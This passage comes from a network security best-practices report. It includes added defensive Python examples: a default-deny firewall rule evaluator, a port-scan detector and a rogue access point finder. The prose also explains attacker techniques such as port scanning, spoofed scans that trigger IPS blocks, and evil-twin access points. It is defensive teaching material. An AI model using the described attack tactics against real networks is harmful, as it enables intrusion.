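    action: str                      # "allow" or "deny"
    direction: Optional[str] = None  # None matches either direction
    src: str = "0.0.0.0/0"           # CIDR; 0.0.0.0/0 matches any address
    dst: str = "0.0.0.0/0"
    proto: Optional[str] = None      # None matches any protocol
    dports: tuple = ()               # empty tuple matches any port
    hours: Optional[range] = None    # None matches any hour
    comment: str = ""

    def matches(self, p: Packet) -> bool:
        return (
            (self.direction is None or self.direction == p.direction)
            and ipaddress.ip_address(p.src) in ipaddress.ip_network(self.src)
            and ipaddress.ip_address(p.dst) in ipaddress.ip_network(self.dst)
            and (self.proto is None or self.proto == p.proto)
            and (not self.dports or p.dport in self.dports)
            and (self.hours is None or p.hour in self.hours)
        )


def evaluate(rules, packet: Packet) -> str:
    """Walk the rule set in order; the first match decides. A packet that
    matches nothing is dropped, which is the default-deny posture."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action
    return "deny"


# Constructed topology: 10.0.0.0/8 is the internal network, 10.1.0.0/24 its DMZ,
# and 203.0.113.0/24 the address range of the outsourced administration team.
INTERNAL, DMZ, ADMIN_NET = "10.0.0.0/8", "10.1.0.0/24", "203.0.113.0/24"

RULESET = [
    # Anti-spoofing comes first: nothing arriving from outside may claim an internal source.
    Rule("deny", direction="in", src=INTERNAL, comment="spoofed internal source"),
    Rule("allow", direction="in", dst=DMZ, proto="tcp", dports=(443,), comment="public HTTPS"),
    Rule("allow", direction="in", src=ADMIN_NET, dst=DMZ, proto="tcp", dports=(22,),
         hours=range(8, 18), comment="admin SSH, business hours only"),
    Rule("allow", direction="out", src=INTERNAL, proto="tcp", dports=(80, 443), comment="web browsing"),
    Rule("allow", direction="out", src=INTERNAL, proto="udp", dports=(53,), comment="DNS"),
    # Anything else falls through to evaluate()'s default deny.
]


if __name__ == "__main__":
    samples = [
        Packet("in", "198.51.100.7", "10.1.0.10", "tcp", 443),   # public web: allow
        Packet("in", "198.51.100.7", "10.1.0.10", "tcp", 22),    # SSH from the Internet: deny
        Packet("in", "10.0.0.5", "10.1.0.10", "tcp", 443),       # spoofed internal source: deny
        Packet("out", "10.0.0.5", "192.0.2.10", "tcp", 25),      # direct outbound SMTP: deny
    ]
    for p in samples:
        print(f"{p.direction:3s} {p.src:>14s} -> {p.dst}:{p.dport}/{p.proto}  {evaluate(RULESET, p)}")
```

Swapping the first two rules silently admits the spoofed packet, which is why rule-set changes belong under change control and why item 7's backup of the rule set should be diffed against the running configuration after every change.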
13. Encrypt Sensitive Data. Encryption helps to protect both the privacy of sensitive data and user authentication information sent over the Internet. In addition, encryption may be required by the Health Insurance Portability and Accountability Act (HIPAA), the Sarbanes-Oxley Act, or other mandates, depending on the industry and location. Data should be encrypted both at rest and in transit.
14. Implement Intrusion Detection/Prevention. Attackers use port scanning tools such as Network Mapper (Nmap) to probe a target network for listening services. The scanner checks each port on a server; where something answers, the attacker tries to identify the software and version behind it and then works on exploiting that service until he or she can enter the network at will. An intrusion detection/prevention system watches for this kind of scanning activity across all ports and raises alarms if suspicious activity is found. Some intrusion prevention systems automatically block the scanning source for a period when a scan is detected. That response needs care: an attacker who spoofs the source address of a scan can make such a system block a legitimate address, and the organization's own authorized vulnerability scanners must be exempted.
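The scan-detection logic an IDS applies to connection attempts, as an added example that is not part of the Faulkner report: a source that touches many distinct ports on one host (a vertical scan) or one port on many hosts (a horizontal sweep) inside a short window is flagged, while repeated connections to a single service are not. The connection-log format, the addresses and the thresholds are constructed for the example.

```python
# Added example, not from the Faulkner report: vertical and horizontal port-scan
# detection over a constructed connection log. Format, addresses and
# thresholds are assumptions for the example.
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

EVENT_RE = re.compile(r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) SYN$")

# Constructed sample: legitimate HTTPS traffic, a nine-port probe of 10.0.0.5
# from 198.51.100.9, and a port-445 sweep across ten hosts from 203.0.113.4.
SAMPLE_LOG = [
    "2019-07-01T10:00:00 10.0.0.12 -> 10.0.0.5:443 SYN",
    "2019-07-01T10:00:01 198.51.100.9 -> 10.0.0.5:21 SYN",
    "2019-07-01T10:00:01 198.51.100.9 -> 10.0.0.5:22 SYN",
    "2019-07-01T10:00:01 198.51.100.9 -> 10.0.0.5:23 SYN",
    "2019-07-01T10:00:02 198.51.100.9 -> 10.0.0.5:25 SYN",
    "2019-07-01T10:00:02 198.51.100.9 -> 10.0.0.5:80 SYN",
    "2019-07-01T10:00:02 198.51.100.9 -> 10.0.0.5:443 SYN",
    "2019-07-01T10:00:03 198.51.100.9 -> 10.0.0.5:445 SYN",
    "2019-07-01T10:00:03 198.51.100.9 -> 10.0.0.5:3389 SYN",
    "2019-07-01T10:00:03 198.51.100.9 -> 10.0.0.5:8080 SYN",
    "2019-07-01T10:00:04 10.0.0.12 -> 10.0.0.5:443 SYN",
] + [f"2019-07-01T10:01:{i:02d} 203.0.113.4 -> 10.0.0.{i}:445 SYN" for i in range(1, 11)]


@dataclass
class Alert:
    src: str
    kind: str      # "vertical" (many ports, one host) or "horizontal" (one port, many hosts)
    target: str    # the host scanned, or the port swept
    count: int     # distinct ports or hosts seen when the alert fired


def parse_event(line):
    m = EVENT_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["port"])


def detect_scans(lines, port_threshold=8, host_threshold=8, window=timedelta(seconds=10)):
    """Sliding-window scan detector; alerts once per (source, kind, target)."""
    recent = defaultdict(deque)        # src -> (ts, dst, port) inside the window
    alerts, seen = [], set()
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        ts, src, dst, port = ev
        q = recent[src]
        q.append((ts, dst, port))
        while q and ts - q[0][0] > window:
            q.popleft()
        ports_by_host, hosts_by_port = defaultdict(set), defaultdict(set)
        for _, d, p in q:
            ports_by_host[d].add(p)
            hosts_by_port[p].add(d)
        for d, ports in ports_by_host.items():
            key = (src, "vertical", d)
            if len(ports) >= port_threshold and key not in seen:
                seen.add(key)
                alerts.append(Alert(src, "vertical", d, len(ports)))
        for p, hosts in hosts_by_port.items():
            key = (src, "horizontal", str(p))
            if len(hosts) >= host_threshold and key not in seen:
                seen.add(key)
                alerts.append(Alert(src, "horizontal", str(p), len(hosts)))
    return alerts


if __name__ == "__main__":
    for a in detect_scans(SAMPLE_LOG):
        print(f"{a.kind:10s} scan from {a.src} against {a.target} ({a.count} in window)")
```

Tuning is the whole job here: thresholds low enough to catch a slow scan produce alerts from monitoring systems and load balancers, so sources the organization operates should be listed and excluded before any automatic blocking is switched on.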
15. Keep Hardware and Software Updated. Attackers are well aware of security vulnerabilities in computers, network equipment, and the software that runs them, and will exploit them. Security-related patches and firmware updates should be evaluated as soon as they are released, and applied if appropriate. A perfect example of why companies must stay on top of patching manifested in the WannaCry ransomware attacks of May 2017. Microsoft had issued the fix (security bulletin MS17-010) two months earlier for the component WannaCry targeted, the SMBv1 implementation of the Server Message Block protocol, but many organizations had either not pushed out the update or were running unsupported Windows versions such as Windows XP. Microsoft did step up and release emergency patches for those unsupported versions, but for networks already damaged by the ransomware the patches came too late. In 2019, Shodan, a search engine for Internet-exposed devices and services, still showed over one million systems exposed to the exploit WannaCry used. Major vendors, including Microsoft, SAP, Oracle, Google, and Adobe, publish security bulletins with patches and vulnerability updates on a monthly or quarterly cadence to help companies keep their systems and networks protected.
16. Respond to Violations Immediately. The
security team must be alerted when an intrusion is detected; tools are available
to automate this process. Response
procedures should be defined that detail levels of authority within the team to
make changes. Some possible actions include: isolating or shutting down breached
systems, making changes to stop access to the intrusion, and alerting internal
management and legal staff. Information about an attack should be collected to
determine the extent of a violation and the systems affected; this information
could be used if violations are prosecuted. Staff should be
trained in proper forensic procedures to ensure evidence is preserved
and admissible in court.
17. Subscribe to an Anti-Malware Update Service. Whether the software is loaded on individual clients or servers, it is imperative to subscribe to an update service to ensure that the enterprise network stays protected against new and emerging malware. This is more important than ever: not only are the numbers of viruses, worms, trojans and other malware increasing, but the types of threat and methods of delivery are constantly evolving. Polymorphic malware changes its own code from one copy to the next to evade scanners that merely look for the signatures of known samples. Newer detection methods look not only for known signatures but monitor files for suspicious behavior and isolate them before they can execute and propagate on the network. Newer still is reputation-based detection, which draws on data crowdsourced from many installations in close to real time.
18. Secure the Premises. Physical access
to the network must be "locked down" by taking such often ignored
precautions as locking doors to sensitive areas, including those to the wiring
closets on each floor, equipment rooms, and the basement area containing
incoming carrier lines and associated interfaces. Access to the data center and
network operations center must be tightly controlled as well. And there must be
frequent monitoring for the presence of unauthorized wireless access points in
the building, the signals of which can be picked up outside the building by a
breed of hackers known as “war drivers” who are often equipped with
high-gain antennas that can pull in even the weakest of signals. All of these
should be treated as potential breach points, especially since they are behind
the firewall and, consequently, unprotected.
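One way to operationalize the rogue-access-point monitoring in item 18, as an added example that is not from this report: a site-survey listing is compared against the organization's authorized AP inventory, and an unknown BSSID that beacons a corporate SSID (a possible evil twin) is ranked separately from any other unauthorized AP. The inventory, the survey lines and the "BSSID,SSID,channel,signal_dBm" field layout are constructed for the example.

```python
# Added example, not from the report: flag access points in a site survey that
# are absent from the authorized AP inventory. Inventory, survey lines and the
# "BSSID,SSID,channel,signal_dBm" field layout are constructed for this example.
from dataclasses import dataclass

AUTHORIZED_APS = {  # constructed: BSSID -> the SSID it is permitted to beacon
    "00:11:22:33:44:01": "CorpNet",
    "00:11:22:33:44:02": "CorpNet",
    "00:11:22:33:44:03": "CorpGuest",
}

SURVEY = """\
00:11:22:33:44:01,CorpNet,6,-41
00:11:22:33:44:02,CorpNet,11,-55
DE:AD:BE:EF:00:01,CorpNet,1,-38
aa:bb:cc:dd:ee:01,Linksys,6,-70
00:11:22:33:44:03,CorpGuest,36,-60
"""


@dataclass(frozen=True)
class Finding:
    bssid: str
    ssid: str
    channel: int
    signal_dbm: int
    kind: str  # "evil_twin", "unknown_ap" or "misconfigured"


def parse_survey(text):
    """Parse non-empty survey lines into (bssid, ssid, channel, signal) tuples."""
    return [(b.lower(), s, int(c), int(sig))
            for b, s, c, sig in (ln.split(",") for ln in text.splitlines() if ln.strip())]


def find_rogue_aps(survey_text, inventory):
    """Return findings sorted strongest signal first (most likely on the premises)."""
    our_ssids = set(inventory.values())
    findings = []
    for bssid, ssid, channel, signal in parse_survey(survey_text):
        if bssid in inventory:
            if inventory[bssid] == ssid:
                continue
            kind = "misconfigured"  # known AP beaconing an SSID it is not assigned
        else:
            # Unknown BSSID using one of our SSIDs: possible evil twin luring
            # corporate clients; any other unknown BSSID still needs locating
            # and a check for a wired uplink behind the firewall.
            kind = "evil_twin" if ssid in our_ssids else "unknown_ap"
        findings.append(Finding(bssid, ssid, channel, signal, kind))
    return sorted(findings, key=lambda f: f.signal_dbm, reverse=True)
```

A real deployment would feed this from a wireless controller export or a periodic survey and page the security team on any evil_twin finding.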
19. Develop and Test a Business
Continuity (Disaster Recovery) Plan. Recent
disasters have shown that developing an effective business continuity plan is
critical to optimum recovery. Organizations that have successfully
survived not
only identified functions that were business critical and planned for their
recovery, they also periodically tested plans before the actual disaster. Some
network security best practices should be part of an organization’s business
continuity plan. The hope is always to have a successful business continuity
plan in place… and never have to use it.
20. Pay Attention to Web Site Security. Web
servers can provide very easy access to the corporate network by even relatively
unskilled hackers. Make sure the material on the Web site contains no
links back to the main servers or to corporate databases and that the
sites are regularly checked for vulnerabilities. Administrative access to the site should be
password protected.
21. Engage Ethical Hackers to Conduct Network Penetration Exercises.
Many organizations are not willing to address software security
until there is unmistakable evidence that the organization is vulnerable. If security has not been a priority, external penetration testers
can demonstrate that the organization’s network is security-deficient. In
particular, penetration testers, often known as "ethical hackers," can be brought in to break a high-profile
network application in order to make the point. This type of
exercise has gained traction in recent years as the Department of Defense has
employed "Hack the Pentagon" and other similar events for white hat
hackers to attempt to penetrate the private defense agency’s infrastructure,
find vulnerabilities, and get paid to do so.
23. Secure Sensitive Information. It seems logical that sensitive data would
be kept under lock and key but that’s not always the case as auditors at KPMG
discovered when checking on the offices and cubicles for none other than the
staff for the Department of Homeland Security’s CIO and chief financial officer.
The auditors uncovered instances of unsecured documents which stated "for
official use only" as well as passwords written down on scraps of paper
left out in the open. Also spotted were unsecured laptops and mobile devices.
Passwords should never be written down unless they are secured in a locked
cabinet. Smartphones and computers must be kept secured at all times.
Outlook
As organizations’ networks become more global, the
focus of best practices must expand beyond protecting the bricks and mortar of
local offices to securing virtual and real offices located around the
world – along with partners, customers, and remote and mobile users. To effectively face all
of these changes, the list of best practices must become a "living
document" that adds a protective layer to the growing network.
Home Workers. Security
best practices also apply to employees who work remotely. Some organizations
consider that working from home is a privilege, not a right. These organizations
require teleworkers to sign a contract allowing for periodic inspections of home
offices. If employees do not sign, they are not allowed to work from home.
Although this is an unusual policy, some say that companies do have the
authority to enforce security policies in home offices. As the number of
teleworkers increases, organizations will have to deal with new
sets of policies for remote and wireless access. Some
companies even require remote or mobile employees to only access their
networks over a secured virtual private network (VPN) using company-owned equipment running a company-standard
software image, to eliminate the chance of infection from malware on
personally-owned machines.
Mobile Devices. Smart phones and
tablets have become the devices of choice, and their security profiles are less
mature than those of traditional computers. This raises a whole new set
of concerns and introduces risks that hadn’t been previously considered,
like the bring-your-own-device (BYOD) movement in which enterprise
users, who are also consumers, pressure enterprise IT departments to
allow the connection of consumer-grade devices, like smartphones and
tablets, to enterprise networks. Security personnel must also monitor
the increasing functionality of wearable devices such as fitness bands
to ensure they don’t put the enterprise at risk.
Updates. Policies
drive network security best practices; to keep pace in this rapidly changing
world, updating security policies is necessary. Some reasons for updating
policies are:
- New Technology – New technologies are often introduced before organizations realize their vulnerabilities. The BYOD trend opens endless possibilities, as unknown and likely unsupported devices are introduced.
- Retired Technology – Security issues may arise when a product is retired by its vendor, thus eliminating security updates and support. Windows XP presents a significant risk, given the termination of patch generation, as do Windows Server 2003 and SQL Server 2005; many companies have still not migrated to a supported operating system, so they remain vulnerable to attacks targeting the OS.
- Regulatory Compliance – Compliance with the Privacy Act, Sarbanes-Oxley, the HIPAA Privacy Rule, and other local regulations is an issue that has caught the attention of upper management, resulting in organizations updating their security policies. Compliance with customer privacy regulations will continue to be especially critical in financial, healthcare, and pharmaceutical companies. Organizations that demonstrate compliance will not only be viewed as good "corporate" citizens, they will also have a competitive edge in an increasingly regulation-conscious environment.
- Changing Business Models – Organizations will increasingly change the way they do business, using the Internet to interact with staff, customers, partners, and suppliers. This network-centric business model continues to blend network structures that were previously isolated, and in the process expands the landscape of security vulnerabilities. Cloud computing, for example, has introduced a whole new series of challenges, as has the trend towards mobile first.
Recommendations
Training for Security Awareness. The
need for employees to support network security best practices is critical.
Support begins and continues with periodic security awareness training for the entire
organization; training everyone prevents inconsistencies in security
awareness within different employee levels. Security awareness is so important
to some companies that they link employee bonuses to attendance at awareness
training sessions. Other companies give employees rewards for following best
practices – and publicize successes; however, lax employees face consequences. To
improve training, some organizations are piggy-backing training with
company-wide events and meetings. Others include security articles in existing
newsletters or on their company Intranets. Security training must be
continually reinforced.
For training and best practices to be effective they must be
supported by top management. Since executives lead by example, they should not
have "inconvenient" security features shut down on their personal
systems or it will negatively affect the security morale for others in the
organization as well as introducing unnecessary risk.
Updating Policies/Practices. Network
security policies and best practices are living documents that need to be
periodically reviewed and updated. Reviews should include an annual risk
analysis to provide detailed security requirements. These detailed security
requirements become the basis for an optimal security position. An evaluation of
current security measures versus desired protection could also be considered. If
a major change in the organization occurs, be it technological or
organizational, this should also be the cue to revisit policies.
Securing Globally. Many
organizations are now expanding security focus to include global suppliers,
partners, customers, acquisitions, and outsourcers. For global organizations,
regulations and security technologies that are supported in the US may not be
allowed abroad, and some US regulations such as the Patriot Act are
considered unacceptable to other countries; to be compliant, security practices should be deployed based on
the requirements and cultures of specific countries or regions. Outsourcing
offshore introduces other security risks. Before offshore shipment to
outsourcers, some companies configure all servers, laptops, and PCs to
corporate standards at head office.
Require security audits of suppliers who connect to corporate assets;
the infamous Target breach was facilitated by a compromised supplier who
had access to Target’s network. To further protect the infrastructure, home office employees travel to the global
location for the installation of a dedicated network connection with firewalls.
Prior to signing a global outsourcing contract, security audits are
advised – including an audit of the physical site – and SLAs should
specify security requirements. Political risks should also be
considered.
Keeping Up With Security Threats and Tools. The
continued effectiveness of security depends on the network security
administrator staying alert to new and emerging threats. This entails
establishing and maintaining contact with various network security watch groups,
such as CERT, US-CERT, SANS, and others. It also entails installing security
patches and antivirus updates in a timely manner when they are issued by
vendors to plug newly discovered security holes in their products. Any lapse in
staying abreast of these developments can compromise network security. It
is also important to keep up with new and emerging network security solutions.
Because of tremendously increased security threats in the past few years,
vendors have responded with new tools and techniques, including network sign-on
tools that immediately identify systems that do not have the most recent
antivirus files or system security patches installed. Analytics, in
conjunction with logs, alerts, threat data, and other security-related
information, are increasingly being employed to predict and prevent security
issues.
Have a Plan. In November 2018, Marriott International went
public with information regarding a breach of its Starwood guest reservation
database. Up to 500 million people had their personal data exposed. Various
hotel chains, including St. Regis, Sheraton Hotels & Resorts, and Westin
Hotels & Resorts were affected. However, the breach had been ongoing
since 2014 and had remained undetected until September 2018.
Unfortunately, this is not a rarity anymore as it’s often months – sometimes
years – before a company is aware that it has fallen to a data compromise. Assume that if
the organization hasn’t yet been breached, it likely will be at some point, and
plan for mitigation and remediation.
Considering Multiple Security Solutions.
It is imperative to recognize that no single security solution fits all
contingencies, and layered security is often required. Firewalls, for example, may not include virus protection,
particularly if the firewall is part of a managed security service offered by a
third party. Many firewalls do not include intrusion detection/prevention capabilities.
Multiple systems require personnel with
appropriate expertise, which also drives up the cost of doing business. However,
considering the cost of a breach caused by neglecting these precautions,
including the effect on company reputation and future business, the price of
good security is a bargain.
Web Links
Adobe: https://www.adobe.com/
Department of Homeland Security: https://www.dhs.gov/
Department of Defense: https://www.defense.gov/
FBI: https://www.fbi.gov/
Global Information Assurance Certification: https://www.giac.org/
Google: https://www.google.com/
IBM: https://www.ibm.com/
International Information Systems Security Certification Consortium:
https://www.isc2.org/
Internet Crime Complaint Center: https://www.ic3.gov/
Microsoft: https://www.microsoft.com/
Oracle: https://www.oracle.com/
Ponemon Institute: https://www.ponemon.com/
SANS Institute: https://www.sans.org/
SAP: https://www.sap.com/
US-CERT: https://www.us-cert.gov/
Verizon Enterprise: https://enterprise.verizon.com/